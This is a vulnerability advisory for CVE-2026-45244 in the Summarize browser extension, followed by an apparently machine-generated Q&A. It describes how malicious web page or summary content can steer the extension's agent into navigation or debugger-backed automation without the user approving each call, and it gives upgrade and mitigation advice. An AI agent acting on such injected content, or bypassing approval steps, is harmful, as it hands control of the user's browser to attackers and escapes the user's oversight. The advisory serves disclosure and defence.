CVE-2026-45244
Summarize Prior Extension Automation Authorization Bypass
Publication date: 2026-05-18
Last updated on: 2026-05-19
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| steipete | summarize | to 0.15.1 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not explicitly address how CVE-2026-45244 affects compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves unauthorized execution of browser automation actions without per-call user approval when the extension automation feature is enabled. Detection would involve monitoring for unexpected or unauthorized automation tool calls triggered by attacker-controlled content.
Since the vulnerability is related to browser extension behavior, detection on a network or system level may require inspecting browser extension logs or monitoring browser automation tool invocations.
No specific commands or detection tools are provided in the available resources.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade the Summarize extension to version 0.15.1 or later, where the missing authorization issue has been fixed.
The fix introduces an explicit user confirmation prompt before executing any automation tool calls, preventing unauthorized or unexpected browser automation.
- Update the Summarize extension to version 0.15.1 or newer.
- Ensure the extension's automation feature is enabled only when necessary and users are aware of the security implications.
- Verify that the extension prompts for user confirmation before executing automation actions.
How can this vulnerability impact me? :
This vulnerability can allow attackers to perform automated browser actions on behalf of the user without their explicit consent for each action. This could lead to unauthorized navigation, manipulation, or debugging actions within the browser environment.
Such unauthorized actions may compromise user security and privacy by enabling attackers to control browser behavior through malicious content.
Can you explain this vulnerability to me?
The vulnerability exists in Summarize versions prior to 0.15.1 and involves a missing authorization check. This flaw allows attackers to execute browser automation actions without requiring user approval for each action when the extension's automation feature is enabled.
Attackers can manipulate the agent by using malicious page or summary content to trigger enabled automation tools such as navigation or debugger-backed actions. This bypasses the final user approval step that normally occurs when a user interacts with attacker-controlled content.